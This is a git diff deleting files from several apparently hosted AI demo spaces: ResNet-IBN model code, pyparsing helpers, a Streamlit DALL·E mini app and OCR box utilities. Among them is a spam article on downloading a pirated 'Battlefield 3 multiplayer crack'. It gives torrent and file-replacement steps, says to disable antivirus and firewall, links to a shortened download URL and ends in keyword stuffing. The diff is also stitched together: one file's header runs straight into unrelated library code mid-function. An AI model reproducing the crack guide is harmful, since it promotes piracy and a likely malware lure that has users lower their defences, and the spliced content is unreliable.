self.conv3(out) - out = self.bn3(out) - - if self.downsample is not None: - residual = self.downsample(x) - - out += residual - out = self.relu(out) - - return out - - -class ResNet(nn.Module): - """Residual network + IBN layer. - - Reference: - - He et al. Deep Residual Learning for Image Recognition. CVPR 2016. - - Pan et al. Two at Once: Enhancing Learning and Generalization - Capacities via IBN-Net. ECCV 2018. - """ - - def __init__( - self, - block, - layers, - num_classes=1000, - loss='softmax', - fc_dims=None, - dropout_p=None, - **kwargs - ): - scale = 64 - self.inplanes = scale - super(ResNet, self).__init__() - self.loss = loss - self.feature_dim = scale * 8 * block.expansion - - self.conv1 = nn.Conv2d( - 3, scale, kernel_size=7, stride=2, padding=3, bias=False - ) - self.bn1 = nn.BatchNorm2d(scale) - self.relu = nn.ReLU(inplace=True) - self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1) - self.layer1 = self._make_layer(block, scale, layers[0]) - self.layer2 = self._make_layer(block, scale * 2, layers[1], stride=2) - self.layer3 = self._make_layer(block, scale * 4, layers[2], stride=2) - self.layer4 = self._make_layer(block, scale * 8, layers[3], stride=2) - self.avgpool = nn.AdaptiveAvgPool2d((1, 1)) - self.fc = self._construct_fc_layer( - fc_dims, scale * 8 * block.expansion, dropout_p - ) - self.classifier = nn.Linear(self.feature_dim, num_classes) - - for m in self.modules(): - if isinstance(m, nn.Conv2d): - n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels - m.weight.data.normal_(0, math.sqrt(2. / n)) - elif isinstance(m, nn.BatchNorm2d): - m.weight.data.fill_(1) - m.bias.data.zero_() - elif isinstance(m, nn.InstanceNorm2d): - m.weight.data.fill_(1) - m.bias.data.zero_() - - def _make_layer(self, block, planes, blocks, stride=1): - downsample = None - if stride != 1 or self.inplanes != planes * block.expansion: - downsample = nn.Sequential( - nn.Conv2d( - self.inplanes, - planes * block.expansion, - kernel_size=1, - stride=stride, - bias=False - ), - nn.BatchNorm2d(planes * block.expansion), - ) - - layers = [] - ibn = True - if planes == 512: - ibn = False - layers.append(block(self.inplanes, planes, ibn, stride, downsample)) - self.inplanes = planes * block.expansion - for i in range(1, blocks): - layers.append(block(self.inplanes, planes, ibn)) - - return nn.Sequential(*layers) - - def _construct_fc_layer(self, fc_dims, input_dim, dropout_p=None): - """Constructs fully connected layer - - Args: - fc_dims (list or tuple): dimensions of fc layers, if None, no fc layers are constructed - input_dim (int): input dimension - dropout_p (float): dropout probability, if None, dropout is unused - """ - if fc_dims is None: - self.feature_dim = input_dim - return None - - assert isinstance( - fc_dims, (list, tuple) - ), 'fc_dims must be either list or tuple, but got {}'.format( - type(fc_dims) - ) - - layers = [] - for dim in fc_dims: - layers.append(nn.Linear(input_dim, dim)) - layers.append(nn.BatchNorm1d(dim)) - layers.append(nn.ReLU(inplace=True)) - if dropout_p is not None: - layers.append(nn.Dropout(p=dropout_p)) - input_dim = dim - - self.feature_dim = fc_dims[-1] - - return nn.Sequential(*layers) - - def featuremaps(self, x): - x = self.conv1(x) - x = self.bn1(x) - x = self.relu(x) - x = self.maxpool(x) - x = self.layer1(x) - x = self.layer2(x) - x = self.layer3(x) - x = self.layer4(x) - return x - - def forward(self, x): - f = self.featuremaps(x) - v = self.avgpool(f) - v = v.view(v.size(0), -1) - if self.fc is not None: - v = self.fc(v) - if not self.training: - return v - y = self.classifier(v) - if self.loss == 'softmax': - return y - elif self.loss == 'triplet': - return y, v - else: - raise KeyError("Unsupported loss: {}".format(self.loss)) - - -def init_pretrained_weights(model, model_url): - """Initializes model with pretrained weights. - - Layers that don't match with pretrained layers in name or size are kept unchanged. - """ - pretrain_dict = model_zoo.load_url(model_url) - model_dict = model.state_dict() - pretrain_dict = { - k: v - for k, v in pretrain_dict.items() - if k in model_dict and model_dict[k].size() == v.size() - } - model_dict.update(pretrain_dict) - model.load_state_dict(model_dict) - - -def resnet50_ibn_a(num_classes, loss='softmax', pretrained=False, **kwargs): - model = ResNet( - Bottleneck, [3, 4, 6, 3], num_classes=num_classes, loss=loss, **kwargs - ) - if pretrained: - init_pretrained_weights(model, model_urls['resnet50']) - return model diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Battlefield 3 Multiplayer Crack Reloaded Free Download A Simple and Effective Solution.md b/spaces/raedeXanto/academic-chatgpt-beta/Battlefield 3 Multiplayer Crack Reloaded Free Download A Simple and Effective Solution.md deleted file mode 100644 index 5d1c6f43c7731756a8195f8b13f6477a8b15a60a..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Battlefield 3 Multiplayer Crack Reloaded Free Download A Simple and Effective Solution.md +++ /dev/null @@ -1,104 +0,0 @@ - -

    Battlefield 3 Multiplayer Crack Reloaded Free Download

    -

    If you are a fan of first-person shooter games, you might have heard of Battlefield 3, one of the most popular and acclaimed titles in the genre. But did you know that you can play it online with other players for free? In this article, we will show you how to download Battlefield 3 multiplayer crack reloaded for free, and give you some tips and tricks for playing the game online.

    -

    battlefield 3 multiplayer crack reloaded free download


    Download File ►►►►► https://tinourl.com/2uL18r



    -

    Introduction

    -

    Before we get into the details of how to download and install the multiplayer crack, let's first understand what Battlefield 3 is, what multiplayer crack reloaded is, and why you might want to download it for free.

    -

    What is Battlefield 3?

    -

    Battlefield 3 is a first-person shooter game developed by EA DICE and published by Electronic Arts in 2011. It is the third main installment in the Battlefield series, and the sequel to Battlefield 2. The game features both a single-player campaign and a multiplayer mode, where players can compete in various modes and maps with up to 64 players on PC, or 24 players on consoles.

    -

    What is multiplayer crack reloaded?

    -

    Multiplayer crack reloaded is a modified version of the game that allows players to bypass the official servers and play online with other players who have the same crack. This means that you don't need to buy the game or have an Origin account to play online. You just need to download the game files and the crack files, and install them on your PC.

    -

    Why would you want to download it for free?

    -

    There are several reasons why you might want to download Battlefield 3 multiplayer crack reloaded for free. Some of them are:

    -
      -
    • You want to try the game before buying it.
    • -
    • You can't afford to buy the game or don't have access to it in your region.
    • -
    • You don't want to deal with Origin or EA's DRM (digital rights management) system.
    • -
    • You want to play with your friends who have the same crack.
    • -
    • You want to experience a different version of the game with custom servers, mods, and hacks.
    • -
    -

    However, keep in mind that downloading and playing Battlefield 3 multiplayer crack reloaded for free is illegal and unethical. You are violating EA's terms of service and copyright laws. You are also risking your PC's security and performance by downloading files from unknown sources. You might encounter viruses, malware, bugs, glitches, crashes, or bans. You are also missing out on some features and updates that are only available on the official servers. Therefore, we do not endorse or recommend downloading or playing Battlefield 3 multiplayer crack reloaded for free. This article is for educational purposes only.

    -

    How to play battlefield 3 online with reloaded crack
    -Battlefield 3 reloaded multiplayer patch download
    -Battlefield 3 cracked servers list 2023
    -Battlefield 3 multiplayer crack reloaded skidrow
    -Download battlefield 3 full version with crack and multiplayer
    -Battlefield 3 reloaded crack fix no survey
    -Battlefield 3 multiplayer crack reloaded password
    -Battlefield 3 online crack razor1911
    -Battlefield 3 multiplayer crack reloaded tutorial
    -Battlefield 3 reloaded update and crack
    -Battlefield 3 multiplayer crack reloaded working
    -Battlefield 3 crack only download free
    -Battlefield 3 multiplayer crack reloaded rar
    -Battlefield 3 online mode enabler crack
    -Battlefield 3 reloaded iso download
    -Battlefield 3 multiplayer crack reloaded no origin
    -Battlefield 3 cracked launcher download
    -Battlefield 3 reloaded keygen generator
    -Battlefield 3 multiplayer crack reloaded mac
    -Battlefield 3 online activation code free
    -Battlefield 3 reloaded system requirements
    -Battlefield 3 multiplayer crack reloaded linux
    -Battlefield 3 cracked zombie mode
    -Battlefield 3 reloaded gameplay video
    -Battlefield 3 multiplayer crack reloaded direct link
    -Battlefield 3 online emulator nexus
    -Battlefield 3 reloaded installation guide
    -Battlefield 3 multiplayer crack reloaded torrent
    -Battlefield 3 cracked coop mode
    -Battlefield 3 reloaded cheats and hacks
    -Battlefield 3 multiplayer crack reloaded megaupload
    -Battlefield 3 online registration key free
    -Battlefield 3 reloaded trainer download
    -Battlefield 3 multiplayer crack reloaded mediafire
    -Battlefield 3 cracked dlc unlocker
    -Battlefield 3 reloaded serial number free
    -Battlefield 3 multiplayer crack reloaded youtube
    -Battlefield 3 online account creator free
    -Battlefield 3 reloaded mods and maps download
    -Battlefield 3 multiplayer crack reloaded filesonic
    -Battlefield 3 cracked dedicated server setup
    -Battlefield 3 reloaded cd key free download
    -Battlefield 3 multiplayer crack reloaded rapidshare
    -Battlefield 3 online profile editor free download
    -Battlefield 3 reloaded error fixer download
    -Battlefield 3 multiplayer crack reloaded hotfile

    -

    How to download Battlefield 3 multiplayer crack reloaded for free

    -

    If you still want to download Battlefield 3 multiplayer crack reloaded for free, here are the steps you need to follow:

    -

    Step 1: Find a reliable source

    -

    The first step is to find a reliable source where you can download the game files and the crack files. There are many websites and torrents that claim to offer these files, but not all of them are trustworthy or safe. You need to do some research and check the reviews, ratings, comments, and feedback from other users before downloading anything. You also need to make sure that the files are compatible with your PC's specifications and operating system.

    -

    Step 2: Download the files

    -

    The second step is to download the files from your chosen source. You will need a torrent client such as uTorrent or BitTorrent to download the torrent files. You will also need a file extractor such as WinRAR or 7-Zip to extract the compressed files. The size of the files might vary depending on your source, but usually they are around 10 GB for the game files and around 100 MB for the crack files.

    -

    Step 3: Install the game and the crack

    -the extracted game folder and follow the instructions. To install the crack, you need to copy and paste all the files from the extracted crack folder to the game folder, replacing the original files. You might need to disable your antivirus or firewall temporarily to avoid any interference.

    -

    Step 4: Enjoy the multiplayer mode

    -

    The fourth and final step is to enjoy the multiplayer mode of Battlefield 3. To play online, you need to run the bf3.exe file from the game folder and select the multiplayer option. You will see a list of servers that are running the multiplayer crack reloaded. You can join any server that has players and matches your preferences. You can also create your own server and invite your friends who have the same crack.

    -

    Tips and tricks for playing Battlefield 3 multiplayer mode

    -

    Now that you have downloaded and installed Battlefield 3 multiplayer crack reloaded for free, you might want to know some tips and tricks for playing the game online. Here are some of them:

    -

    Choose your class wisely

    -

    Battlefield 3 has four classes that you can choose from: Assault, Engineer, Support, and Recon. Each class has its own strengths, weaknesses, and roles in the battlefield. You should choose a class that suits your playstyle and complements your team. For example, if you like to heal and revive your teammates, you should choose Assault. If you like to repair and destroy vehicles, you should choose Engineer. If you like to provide ammo and suppressive fire, you should choose Support. If you like to snipe and spot enemies, you should choose Recon.

    -

    Use teamwork and communication

    -

    Battlefield 3 is a team-based game that requires teamwork and communication to win. You should always work with your squad and your team, and use the in-game chat or voice chat to coordinate your actions. You should also follow the orders of your squad leader and your commander, and help them achieve their objectives. You should also share your resources and information with your teammates, such as ammo, health, vehicles, enemies, etc.

    -

    Customize your weapons and gadgets

    -

    Battlefield 3 has a wide variety of weapons and gadgets that you can use in the multiplayer mode. You can unlock new weapons and gadgets by leveling up your class and completing assignments. You can also customize your weapons and gadgets by attaching different accessories and attachments, such as scopes, silencers, grips, lasers, etc. You should experiment with different combinations and find what works best for you.

    -

    Learn the maps and modes

    -

    Battlefield 3 has many maps and modes that you can play in the multiplayer mode. Each map has its own layout, terrain, weather, vehicles, etc. Each mode has its own rules, objectives, time limit, etc. You should learn the maps and modes by playing them often and studying their features. You should also adapt your strategy and tactics according to the map and mode you are playing.

    -

    Conclusion

    -

    Battlefield 3 is a great game that offers a thrilling and immersive multiplayer experience. However, if you want to play it online for free, you need to download Battlefield 3 multiplayer crack reloaded for free. This is a risky and illegal way of playing the game that might cause you some problems. Therefore, we advise you to buy the game legally or play it offline instead. We hope this article was helpful for you.

    -

    FAQs

    -
      -
    • Q: Is Battlefield 3 multiplayer crack reloaded safe?
    • -
    • A: No, it is not safe. You are downloading files from unknown sources that might contain viruses or malware. You are also violating EA's terms of service and copyright laws.
    • -
    • Q: Is Battlefield 3 multiplayer crack reloaded updated?
    • -
    • A: No, it is not updated. You are playing an outdated version of the game that does not have the latest features and updates that are available on the official servers.
    • -
    • Q: Is Battlefield 3 multiplayer crack reloaded fun?
    • -
    • A: Yes, it can be fun. You can play online with other players who have the same crack. You can also experience a different version of the game with custom servers, mods, and hacks.
    • -
    • Q: How can I buy Battlefield 3 legally?
    • -
    • A: You can buy Battlefield 3 legally from EA's website or Origin's platform. You can also buy it from other online or offline retailers.
    • -
    • Q: How can I play Battlefield 3 offline?
    • -
    • A: You can play Battlefield 3 offline by selecting the single-player option from the main menu. You can also play some co-op missions with a friend online or offline.
    • -
    -

    0a6ba089eb
    -
    -
    \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Download Norton Antivirus REPACK Free Trial For 60 Days.md b/spaces/raedeXanto/academic-chatgpt-beta/Download Norton Antivirus REPACK Free Trial For 60 Days.md deleted file mode 100644 index b3d6162e6797ee491e55963a4d8cd29fc3f98e12..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Download Norton Antivirus REPACK Free Trial For 60 Days.md +++ /dev/null @@ -1,91 +0,0 @@ -
    - - -' - # make_html_tags returns pyparsing expressions for the opening and - # closing tags as a 2-tuple - a, a_end = make_html_tags("A") - link_expr = a + SkipTo(a_end)("link_text") + a_end - - for link in link_expr.search_string(text): - # attributes in the tag (like "href" shown here) are - # also accessible as named results - print(link.link_text, '->', link.href) - - prints:: - - pyparsing -> https://github.com/pyparsing/pyparsing/wiki - """ - return _makeTags(tag_str, False) - - -def make_xml_tags( - tag_str: Union[str, ParserElement] -) -> Tuple[ParserElement, ParserElement]: - """Helper to construct opening and closing tag expressions for XML, - given a tag name. Matches tags only in the given upper/lower case. - - Example: similar to :class:`make_html_tags` - """ - return _makeTags(tag_str, True) - - -any_open_tag, any_close_tag = make_html_tags( - Word(alphas, alphanums + "_:").set_name("any tag") -) - -_htmlEntityMap = {k.rstrip(";"): v for k, v in html.entities.html5.items()} -common_html_entity = Regex("&(?P" + "|".join(_htmlEntityMap) + ");").set_name( - "common HTML entity" -) - - -def replace_html_entity(t): - """Helper parser action to replace common HTML entities with their special characters""" - return _htmlEntityMap.get(t.entity) - - -class OpAssoc(Enum): - LEFT = 1 - RIGHT = 2 - - -InfixNotationOperatorArgType = Union[ - ParserElement, str, Tuple[Union[ParserElement, str], Union[ParserElement, str]] -] -InfixNotationOperatorSpec = Union[ - Tuple[ - InfixNotationOperatorArgType, - int, - OpAssoc, - OptionalType[ParseAction], - ], - Tuple[ - InfixNotationOperatorArgType, - int, - OpAssoc, - ], -] - - -def infix_notation( - base_expr: ParserElement, - op_list: List[InfixNotationOperatorSpec], - lpar: Union[str, ParserElement] = Suppress("("), - rpar: Union[str, ParserElement] = Suppress(")"), -) -> ParserElement: - """Helper method for constructing grammars of expressions made up of - operators working in a precedence hierarchy. Operators may be unary - or binary, left- or right-associative. Parse actions can also be - attached to operator expressions. The generated parser will also - recognize the use of parentheses to override operator precedences - (see example below). - - Note: if you define a deep operator list, you may see performance - issues when using infix_notation. See - :class:`ParserElement.enable_packrat` for a mechanism to potentially - improve your parser performance. - - Parameters: - - ``base_expr`` - expression representing the most basic operand to - be used in the expression - - ``op_list`` - list of tuples, one for each operator precedence level - in the expression grammar; each tuple is of the form ``(op_expr, - num_operands, right_left_assoc, (optional)parse_action)``, where: - - - ``op_expr`` is the pyparsing expression for the operator; may also - be a string, which will be converted to a Literal; if ``num_operands`` - is 3, ``op_expr`` is a tuple of two expressions, for the two - operators separating the 3 terms - - ``num_operands`` is the number of terms for this operator (must be 1, - 2, or 3) - - ``right_left_assoc`` is the indicator whether the operator is right - or left associative, using the pyparsing-defined constants - ``OpAssoc.RIGHT`` and ``OpAssoc.LEFT``. - - ``parse_action`` is the parse action to be associated with - expressions matching this operator expression (the parse action - tuple member may be omitted); if the parse action is passed - a tuple or list of functions, this is equivalent to calling - ``set_parse_action(*fn)`` - (:class:`ParserElement.set_parse_action`) - - ``lpar`` - expression for matching left-parentheses; if passed as a - str, then will be parsed as Suppress(lpar). If lpar is passed as - an expression (such as ``Literal('(')``), then it will be kept in - the parsed results, and grouped with them. (default= ``Suppress('(')``) - - ``rpar`` - expression for matching right-parentheses; if passed as a - str, then will be parsed as Suppress(rpar). If rpar is passed as - an expression (such as ``Literal(')')``), then it will be kept in - the parsed results, and grouped with them. (default= ``Suppress(')')``) - - Example:: - - # simple example of four-function arithmetic with ints and - # variable names - integer = pyparsing_common.signed_integer - varname = pyparsing_common.identifier - - arith_expr = infix_notation(integer | varname, - [ - ('-', 1, OpAssoc.RIGHT), - (one_of('* /'), 2, OpAssoc.LEFT), - (one_of('+ -'), 2, OpAssoc.LEFT), - ]) - - arith_expr.run_tests(''' - 5+3*6 - (5+3)*6 - -2--11 - ''', full_dump=False) - - prints:: - - 5+3*6 - [[5, '+', [3, '*', 6]]] - - (5+3)*6 - [[[5, '+', 3], '*', 6]] - - -2--11 - [[['-', 2], '-', ['-', 11]]] - """ - # captive version of FollowedBy that does not do parse actions or capture results names - class _FB(FollowedBy): - def parseImpl(self, instring, loc, doActions=True): - self.expr.try_parse(instring, loc) - return loc, [] - - _FB.__name__ = "FollowedBy>" - - ret = Forward() - if isinstance(lpar, str): - lpar = Suppress(lpar) - if isinstance(rpar, str): - rpar = Suppress(rpar) - - # if lpar and rpar are not suppressed, wrap in group - if not (isinstance(rpar, Suppress) and isinstance(rpar, Suppress)): - lastExpr = base_expr | Group(lpar + ret + rpar) - else: - lastExpr = base_expr | (lpar + ret + rpar) - - for i, operDef in enumerate(op_list): - opExpr, arity, rightLeftAssoc, pa = (operDef + (None,))[:4] - if isinstance(opExpr, str_type): - opExpr = ParserElement._literalStringClass(opExpr) - if arity == 3: - if not isinstance(opExpr, (tuple, list)) or len(opExpr) != 2: - raise ValueError( - "if numterms=3, opExpr must be a tuple or list of two expressions" - ) - opExpr1, opExpr2 = opExpr - term_name = "{}{} term".format(opExpr1, opExpr2) - else: - term_name = "{} term".format(opExpr) - - if not 1 <= arity <= 3: - raise ValueError("operator must be unary (1), binary (2), or ternary (3)") - - if rightLeftAssoc not in (OpAssoc.LEFT, OpAssoc.RIGHT): - raise ValueError("operator must indicate right or left associativity") - - thisExpr = Forward().set_name(term_name) - if rightLeftAssoc is OpAssoc.LEFT: - if arity == 1: - matchExpr = _FB(lastExpr + opExpr) + Group(lastExpr + opExpr[1, ...]) - elif arity == 2: - if opExpr is not None: - matchExpr = _FB(lastExpr + opExpr + lastExpr) + Group( - lastExpr + (opExpr + lastExpr)[1, ...] - ) - else: - matchExpr = _FB(lastExpr + lastExpr) + Group(lastExpr[2, ...]) - elif arity == 3: - matchExpr = _FB( - lastExpr + opExpr1 + lastExpr + opExpr2 + lastExpr - ) + Group(lastExpr + OneOrMore(opExpr1 + lastExpr + opExpr2 + lastExpr)) - elif rightLeftAssoc is OpAssoc.RIGHT: - if arity == 1: - # try to avoid LR with this extra test - if not isinstance(opExpr, Opt): - opExpr = Opt(opExpr) - matchExpr = _FB(opExpr.expr + thisExpr) + Group(opExpr + thisExpr) - elif arity == 2: - if opExpr is not None: - matchExpr = _FB(lastExpr + opExpr + thisExpr) + Group( - lastExpr + (opExpr + thisExpr)[1, ...] - ) - else: - matchExpr = _FB(lastExpr + thisExpr) + Group( - lastExpr + thisExpr[1, ...] - ) - elif arity == 3: - matchExpr = _FB( - lastExpr + opExpr1 + thisExpr + opExpr2 + thisExpr - ) + Group(lastExpr + opExpr1 + thisExpr + opExpr2 + thisExpr) - if pa: - if isinstance(pa, (tuple, list)): - matchExpr.set_parse_action(*pa) - else: - matchExpr.set_parse_action(pa) - thisExpr <<= (matchExpr | lastExpr).setName(term_name) - lastExpr = thisExpr - ret <<= lastExpr - return ret - - -def indentedBlock(blockStatementExpr, indentStack, indent=True, backup_stacks=[]): - """ - (DEPRECATED - use IndentedBlock class instead) - Helper method for defining space-delimited indentation blocks, - such as those used to define block statements in Python source code. - - Parameters: - - - ``blockStatementExpr`` - expression defining syntax of statement that - is repeated within the indented block - - ``indentStack`` - list created by caller to manage indentation stack - (multiple ``statementWithIndentedBlock`` expressions within a single - grammar should share a common ``indentStack``) - - ``indent`` - boolean indicating whether block must be indented beyond - the current level; set to ``False`` for block of left-most statements - (default= ``True``) - - A valid block must contain at least one ``blockStatement``. - - (Note that indentedBlock uses internal parse actions which make it - incompatible with packrat parsing.) - - Example:: - - data = ''' - def A(z): - A1 - B = 100 - G = A2 - A2 - A3 - B - def BB(a,b,c): - BB1 - def BBA(): - bba1 - bba2 - bba3 - C - D - def spam(x,y): - def eggs(z): - pass - ''' - - - indentStack = [1] - stmt = Forward() - - identifier = Word(alphas, alphanums) - funcDecl = ("def" + identifier + Group("(" + Opt(delimitedList(identifier)) + ")") + ":") - func_body = indentedBlock(stmt, indentStack) - funcDef = Group(funcDecl + func_body) - - rvalue = Forward() - funcCall = Group(identifier + "(" + Opt(delimitedList(rvalue)) + ")") - rvalue << (funcCall | identifier | Word(nums)) - assignment = Group(identifier + "=" + rvalue) - stmt << (funcDef | assignment | identifier) - - module_body = OneOrMore(stmt) - - parseTree = module_body.parseString(data) - parseTree.pprint() - - prints:: - - [['def', - 'A', - ['(', 'z', ')'], - ':', - [['A1'], [['B', '=', '100']], [['G', '=', 'A2']], ['A2'], ['A3']]], - 'B', - ['def', - 'BB', - ['(', 'a', 'b', 'c', ')'], - ':', - [['BB1'], [['def', 'BBA', ['(', ')'], ':', [['bba1'], ['bba2'], ['bba3']]]]]], - 'C', - 'D', - ['def', - 'spam', - ['(', 'x', 'y', ')'], - ':', - [[['def', 'eggs', ['(', 'z', ')'], ':', [['pass']]]]]]] - """ - backup_stacks.append(indentStack[:]) - - def reset_stack(): - indentStack[:] = backup_stacks[-1] - - def checkPeerIndent(s, l, t): - if l >= len(s): - return - curCol = col(l, s) - if curCol != indentStack[-1]: - if curCol > indentStack[-1]: - raise ParseException(s, l, "illegal nesting") - raise ParseException(s, l, "not a peer entry") - - def checkSubIndent(s, l, t): - curCol = col(l, s) - if curCol > indentStack[-1]: - indentStack.append(curCol) - else: - raise ParseException(s, l, "not a subentry") - - def checkUnindent(s, l, t): - if l >= len(s): - return - curCol = col(l, s) - if not (indentStack and curCol in indentStack): - raise ParseException(s, l, "not an unindent") - if curCol < indentStack[-1]: - indentStack.pop() - - NL = OneOrMore(LineEnd().set_whitespace_chars("\t ").suppress()) - INDENT = (Empty() + Empty().set_parse_action(checkSubIndent)).set_name("INDENT") - PEER = Empty().set_parse_action(checkPeerIndent).set_name("") - UNDENT = Empty().set_parse_action(checkUnindent).set_name("UNINDENT") - if indent: - smExpr = Group( - Opt(NL) - + INDENT - + OneOrMore(PEER + Group(blockStatementExpr) + Opt(NL)) - + UNDENT - ) - else: - smExpr = Group( - Opt(NL) - + OneOrMore(PEER + Group(blockStatementExpr) + Opt(NL)) - + Opt(UNDENT) - ) - - # add a parse action to remove backup_stack from list of backups - smExpr.add_parse_action( - lambda: backup_stacks.pop(-1) and None if backup_stacks else None - ) - smExpr.set_fail_action(lambda a, b, c, d: reset_stack()) - blockStatementExpr.ignore(_bslash + LineEnd()) - return smExpr.set_name("indented block") - - -# it's easy to get these comment structures wrong - they're very common, so may as well make them available -c_style_comment = Combine(Regex(r"/\*(?:[^*]|\*(?!/))*") + "*/").set_name( - "C style comment" -) -"Comment of the form ``/* ... */``" - -html_comment = Regex(r"").set_name("HTML comment") -"Comment of the form ````" - -rest_of_line = Regex(r".*").leave_whitespace().set_name("rest of line") -dbl_slash_comment = Regex(r"//(?:\\\n|[^\n])*").set_name("// comment") -"Comment of the form ``// ... (to end of line)``" - -cpp_style_comment = Combine( - Regex(r"/\*(?:[^*]|\*(?!/))*") + "*/" | dbl_slash_comment -).set_name("C++ style comment") -"Comment of either form :class:`c_style_comment` or :class:`dbl_slash_comment`" - -java_style_comment = cpp_style_comment -"Same as :class:`cpp_style_comment`" - -python_style_comment = Regex(r"#.*").set_name("Python style comment") -"Comment of the form ``# ... (to end of line)``" - - -# build list of built-in expressions, for future reference if a global default value -# gets updated -_builtin_exprs = [v for v in vars().values() if isinstance(v, ParserElement)] - - -# pre-PEP8 compatible names -delimitedList = delimited_list -countedArray = counted_array -matchPreviousLiteral = match_previous_literal -matchPreviousExpr = match_previous_expr -oneOf = one_of -dictOf = dict_of -originalTextFor = original_text_for -nestedExpr = nested_expr -makeHTMLTags = make_html_tags -makeXMLTags = make_xml_tags -anyOpenTag, anyCloseTag = any_open_tag, any_close_tag -commonHTMLEntity = common_html_entity -replaceHTMLEntity = replace_html_entity -opAssoc = OpAssoc -infixNotation = infix_notation -cStyleComment = c_style_comment -htmlComment = html_comment -restOfLine = rest_of_line -dblSlashComment = dbl_slash_comment -cppStyleComment = cpp_style_comment -javaStyleComment = java_style_comment -pythonStyleComment = python_style_comment diff --git a/spaces/tom-doerr/logo_generator/app/streamlit/app.py b/spaces/tom-doerr/logo_generator/app/streamlit/app.py deleted file mode 100644 index 7af9f9bdc771af703b68600a7ed9afa7c8464921..0000000000000000000000000000000000000000 --- a/spaces/tom-doerr/logo_generator/app/streamlit/app.py +++ /dev/null @@ -1,110 +0,0 @@ -#!/usr/bin/env python -# coding: utf-8 - -from datetime import datetime - -import streamlit as st -from backend import ServiceError, get_images_from_backend, get_model_version - -st.sidebar.markdown( - """ - -

    - -

    -""", - unsafe_allow_html=True, -) -st.sidebar.markdown( - """ -___ -

    -DALL·E mini is an AI model that generates images from any prompt you give! -

    - -

    -Created by Boris Dayma et al. 2021-2022 -
    -
    GitHub | Project Report -

    - """, - unsafe_allow_html=True, -) - -st.header("DALL·E mini") -st.subheader("Generate images from text") - -prompt = st.text_input("What do you want to see?") - -DEBUG = False -if prompt != "": - container = st.empty() - container.markdown( - f""" - -
    -
    - -
    -
    - Predictions may take up to 5mn under high load. Please stand by. - """, - unsafe_allow_html=True, - ) - - try: - backend_url = st.secrets["BACKEND_SERVER"] + "/generate" - selected = get_images_from_backend(prompt, backend_url) - - margin = 0.1 # for better position of zoom in arrow - n_columns = 3 - cols = st.columns([1] + [margin, 1] * (n_columns - 1)) - for i, img in enumerate(selected): - cols[(i % n_columns) * 2].image(img) - container.markdown(f"**{prompt}**") - - version_url = st.secrets["BACKEND_SERVER"] + "/version" - version = get_model_version(version_url) - st.sidebar.markdown( - f"
    {version}
    ", unsafe_allow_html=True - ) - - st.markdown( - f""" - These results have been obtained using model `{version}` from [an ongoing training run](https://wandb.ai/dalle-mini/dalle-mini/runs/mheh9e55). - """ - ) - - st.button("Again!", key="again_button") - - except ServiceError as error: - container.text(f"Service unavailable, status: {error.status_code}") - except KeyError: - if DEBUG: - container.markdown( - """ - **Error: BACKEND_SERVER unset** - - Please, create a file called `.streamlit/secrets.toml` inside the app's folder and include a line to configure the server URL: - ``` - BACKEND_SERVER="" - ``` - """ - ) - else: - container.markdown( - "Error -5, please try again or [report it](mailto:pcuenca-dalle@guenever.net)." - ) diff --git a/spaces/tomofi/MMOCR/mmocr/utils/box_util.py b/spaces/tomofi/MMOCR/mmocr/utils/box_util.py deleted file mode 100644 index de7be7aa645c042eede51a96f123b6775f58e4f5..0000000000000000000000000000000000000000 --- a/spaces/tomofi/MMOCR/mmocr/utils/box_util.py +++ /dev/null @@ -1,199 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import functools - -import numpy as np - -from mmocr.utils.check_argument import is_2dlist, is_type_list - - -def is_on_same_line(box_a, box_b, min_y_overlap_ratio=0.8): - """Check if two boxes are on the same line by their y-axis coordinates. - - Two boxes are on the same line if they overlap vertically, and the length - of the overlapping line segment is greater than min_y_overlap_ratio * the - height of either of the boxes. - - Args: - box_a (list), box_b (list): Two bounding boxes to be checked - min_y_overlap_ratio (float): The minimum vertical overlapping ratio - allowed for boxes in the same line - - Returns: - The bool flag indicating if they are on the same line - """ - a_y_min = np.min(box_a[1::2]) - b_y_min = np.min(box_b[1::2]) - a_y_max = np.max(box_a[1::2]) - b_y_max = np.max(box_b[1::2]) - - # Make sure that box a is always the box above another - if a_y_min > b_y_min: - a_y_min, b_y_min = b_y_min, a_y_min - a_y_max, b_y_max = b_y_max, a_y_max - - if b_y_min <= a_y_max: - if min_y_overlap_ratio is not None: - sorted_y = sorted([b_y_min, b_y_max, a_y_max]) - overlap = sorted_y[1] - sorted_y[0] - min_a_overlap = (a_y_max - a_y_min) * min_y_overlap_ratio - min_b_overlap = (b_y_max - b_y_min) * min_y_overlap_ratio - return overlap >= min_a_overlap or \ - overlap >= min_b_overlap - else: - return True - return False - - -def stitch_boxes_into_lines(boxes, max_x_dist=10, min_y_overlap_ratio=0.8): - """Stitch fragmented boxes of words into lines. - - Note: part of its logic is inspired by @Johndirr - (https://github.com/faustomorales/keras-ocr/issues/22) - - Args: - boxes (list): List of ocr results to be stitched - max_x_dist (int): The maximum horizontal distance between the closest - edges of neighboring boxes in the same line - min_y_overlap_ratio (float): The minimum vertical overlapping ratio - allowed for any pairs of neighboring boxes in the same line - - Returns: - merged_boxes(list[dict]): List of merged boxes and texts - """ - - if len(boxes) <= 1: - return boxes - - merged_boxes = [] - - # sort groups based on the x_min coordinate of boxes - x_sorted_boxes = sorted(boxes, key=lambda x: np.min(x['box'][::2])) - # store indexes of boxes which are already parts of other lines - skip_idxs = set() - - i = 0 - # locate lines of boxes starting from the leftmost one - for i in range(len(x_sorted_boxes)): - if i in skip_idxs: - continue - # the rightmost box in the current line - rightmost_box_idx = i - line = [rightmost_box_idx] - for j in range(i + 1, len(x_sorted_boxes)): - if j in skip_idxs: - continue - if is_on_same_line(x_sorted_boxes[rightmost_box_idx]['box'], - x_sorted_boxes[j]['box'], min_y_overlap_ratio): - line.append(j) - skip_idxs.add(j) - rightmost_box_idx = j - - # split line into lines if the distance between two neighboring - # sub-lines' is greater than max_x_dist - lines = [] - line_idx = 0 - lines.append([line[0]]) - for k in range(1, len(line)): - curr_box = x_sorted_boxes[line[k]] - prev_box = x_sorted_boxes[line[k - 1]] - dist = np.min(curr_box['box'][::2]) - np.max(prev_box['box'][::2]) - if dist > max_x_dist: - line_idx += 1 - 